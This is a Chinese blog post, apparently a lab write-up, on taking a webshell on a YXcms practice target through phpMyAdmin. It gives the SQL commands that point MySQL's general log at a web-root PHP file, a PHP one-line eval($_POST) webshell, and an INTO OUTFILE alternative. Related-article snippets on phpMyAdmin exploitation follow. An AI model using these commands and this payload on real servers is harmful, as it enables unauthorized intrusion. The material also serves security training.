YXcms之利用phpMyAdmin拿shell

最新推荐文章于 2023-06-28 09:35:12 发布
最新推荐文章于 2023-06-28 09:35:12 发布
阅读量878 收藏 1
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/109199303
版权

前些天大哥们在学校内网搭了这个YXcms靶场,记录一下这次测试过程的一些方法感受,分享一下。
首先信息收集一波,不管拿到什么站点,第一件要做的事就是信息收集,收集越多的信息,那拿下这个站点的成功率也就越高,但这里因为是内网搭建的 所以这里就不进行whois,子域名探查了,
用御剑进行目录扫描:
在这里插入图片描述

发现有phpinfo页面,那就能知道配置信息了,还有phpMyAdmin,进去看看
在这里插入图片描述

尝试弱密码登陆,成功进入管理页面
在这里插入图片描述

百度一下,phpMyAdmin怎么拿shell,点击变量开启日志文件,然后设置日志文件的存储路径
在这里插入图片描述

点击sql,创建日志文件,并定义它的路径
SET GLOBAL general_log_file=‘C:/phpStudy/www/Lin.php’
查看日志功能是否开启
show variables like ‘%general%’;
在这里插入图片描述

确定日志文件开启,路径也确定了。那就可以开搞了,写入一句话
select ‘<?php eval($_POST[Lin]);?>’
在这里插入图片描述

(这里如果没有禁用outfile的话ye是可以直接
select ‘<?php eval($_POST[lin]);?>’ into outfile ‘/var/www/Lin.php’
但这里禁用了 那就没办法了)

上菜刀,拿到shell

在这里插入图片描述

Lin冲啊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用phpmyadmin找回wordpress忘记管理密码
09-29
今天在安装WP时候由于突然网络原因,初始密码页面没有看到。由于邮箱是随便填写的,故通过邮箱找不回密码了。于是用phpmyadmin来修改密码。
YXcmsApp建站系统 v1.3.6
12-06
1、BugFix:修正后台和会员中心登陆错误后验证码不刷新导致可暴力破解 2、优化:加固安装时候默认生成的加密秘钥 3、BugFix:修正后台和会员中心登陆错误后验证码不刷新导致可暴力破解 4、BugFix:修正后台开启数据库缓存后不能发布、删除、编辑信息 手动升
利用phpmyadmin设置mysql的权限方法
09-09
主要介绍了如何利用phpmyadmin设置mysql的权限方法,需要的朋友可以参考下
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
YXcms建站系统(兼容手机) v1.4.7
10-22
Yxcms是一款高效,灵活,实用,免费的企业建站系统,基于PHP和mysql技术,让您拥有更加专业的企业建站和企业网站制作服务。采用三级缓存:数据库缓存、模板缓存、静态缓存,可使网站数据达到百万级负载.采用功能与显示分离设计,灵活的标签库和任意拓展的插件机制,让您随心所欲,将DIY进行到底。拥有建站各种实用功能,摒弃各种复杂繁琐的功能操作。卓越的用户体验,让您使用起来方便明了。遵循BSD开源协议,不对用户做任何功能限制,保证用户二次商业开发使用。后台地址:http//youraddress/?r=admin后台默认账户:admin 密码:123456近期部分用户反馈安装包下载后360报毒问题,经测试360会将protected文件夹下的php文件误报为病毒,目前已经向360反馈误报信息,请大家放心使用。
YxCMS_1.4.7.zip
04-17
Yxcms php建站系统 1.4.7
YXcms之通过后台文件插马拿shell
weixin_43071873的博客
10-21 1977
PS:这篇可能没什么营养,但个人觉得有点意思,所以还是分享一下 进入页面可以看到公告有后台地址 进入后台 进入后台一开始我的想法是找个什么东西插个一句话木马啥的, 于是我就盯上了前台模板 一句话是插入了,但是我们得激活他啊,不知道路径那怎么访问呢。 按F12查了好久看了好久实在是找不到,也就作罢了 这个不行,那就换个页面咯, 访问这个页面,编译一下一句话,成功拿到shell了 但是很奇怪,因为这是个比较老的漏洞了,查了yxcms的所有漏洞没发现有这个,不过他这个文件写入就很像 难道是因为前
记录一次模拟内网渗透(一)
m0_63441547的博客
04-25 1187
这是一次有趣的内网渗透,作此文章仅是自己的学习笔记,还请各路神仙多多指点~kali攻击机ip:192.168.204.128web服务器外网ip:192.168.204.138web服务器内网ip:192.168.52.143域控主机ip:192.168.52.138域成员ip:192.168.52.141本次攻击的拓扑图此次实验就是拿下web服务器,域成员和域控服务器开搞开搞!!!!!!使用nmap扫描web服务器可以看到开放的端口。先访问80端口不错,挺多信息,但是没有找到漏洞点。
mysql和php环境_怎么搭建php环境Apache+PHP+mysql
weixin_29189381的博客
01-19 431
展开全部一、32313133353236313431303231363533e78988e69d8331333339653664Apache安装版本解释:openssl是表示带有openssl模块,利用openssl就可以给Apache配置SSL安全链接的,也就是使用https://方式进行访问。nossl则表示不带OpenSSL模块,无 法用于SSL安全链接,在这里我们下载带OpenSSL的。选...
win7 php开发环境搭建,Windows7下PHP开发环境安装配置图文方法
weixin_39634351的博客
03-09 116
操作系统:Windows 7 UltimateWEB服务器:IIS 6.1(内部版本7600)。数据库:MySql5.0.67PHP版本:5.2.13我还担心Win7下可能会不兼容,结果是一点问题都没有。一、安装MySql数据库MySql数据库在这里下载:http://www.mysql.com/downloads/客户端工具Navicat(导航猫)在这里下载:http://www.navicat...
phpMyAdmin漏洞利用与安全防范
02-25
很多公司和个人都喜欢使用phpMyAdmin来管理MySQL数据库——在zoomeye中搜索关键字phpmyadmin,我国位居第二,如下图1所示。phpMyAdmin功能非常强大,可以执行命令,导入或者导出数据库,可以说通过phpMyAdmin可以完全操控Mysql数据库。但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、Xamp等,这些架构的默认密码为root,如果未修改密码,极易被渗透。p
phpmyadmin批量爆破
01-23
批量查找路径
Centos安装mysql8.0.26
u010792184的博客
03-03 302
表示表名存储在磁盘是小写的,但是比较的时候是不区分大小写。注释my.cnf文件“跳过数据库权限验证”# 表示记录下没有使用索引的查询。# 表示跳过数据库权限验证。# 表示查询超过两秒才记录。# 表示语法校验规则。
yxcms实验报告
weixin_45477500的博客
11-25 1289
文章目录 记一次靶场练习实验 实验工具 搭建环境 实验要求 实验步骤 第一个Flag(弱口令) 寻找第二个Flag(hydra密码爆破) 寻找第三个Flag(Linux提权) 实验工具 VMware Workstation 15 Player 百度云网盘提取码:xbb5 搭建环境 1.外网靶场 IP:192.168.100.130 NAT模式 2.调整物理机的网卡VMnet8的ipv4为192.1...
yxcms弱口令至getshell 漏洞复现
最新发布
Boom!脑洞大爆炸的博客
06-28 1637
yxcms弱口令至getshell 漏洞复现
ATT&CK实战系列(一)
Zlirving_的博客
02-19 615
本文较长,思路比较混乱,主要是提高实践体验,师傅们轻喷 由于之前一靶场环境问题,先做了二靶场 ATT&CK实战系列(二)琢磨篇 该靶机是红日安全团队出的域渗透靶机。 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 压缩包中的win7为VM1,win2003为VM2,win2008为VM3,拓扑图如下所示: 环境说明 攻击机 攻击机 win7 ip:192.168.101.133 攻击机 kali ip:192.168.101.129
多节点靶场(1)--Yxcms靶场分析
u012335061的博客
11-22 2861
**** 多节点靶场(1)–Yxcms靶场分析** **链接: 任务:找找flag,一共有三个: 已经知道是yxcms,可以去网上看一下,这个cms爆出过什么漏洞,可以复现一下 Yxcms登录后台地址:http://192.168.100.130/index.php?r=admin/index/login Yxcms后台登录页面存在弱口令,默认用户密码是...
phpMyAdmin到getshell
weixin_44940180的博客
08-17 212
想要使用into outfile或者load_file需要先查看secure_file_priv 如果后面有路径,表示上传文件至某个路径 若为null,则表示不可以使用into outfile上传文件 如果在命令行直接设置,则会报错,表示它是一个只读变量 所以如果一旦这里为null,无法使用into outfile来上传后门 SHOW VARIABLES LIKE '%general%'; 查看日志文件功能是否开启以及文件路径 默认的样子 SET GLOBAL general_log='on'
利用dockercompose搭建LAMP+phpmyadmin环境
05-13
可以按照以下步骤搭建LAMP+phpmyadmin环境: 1. 安装Docker和Docker Compose 2. 创建一个新的文件夹,例如“lamp-phpmyadmin”,并在其中创建一个名为“docker-compose.yml”的文件 3. 在“docker-compose.yml”...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值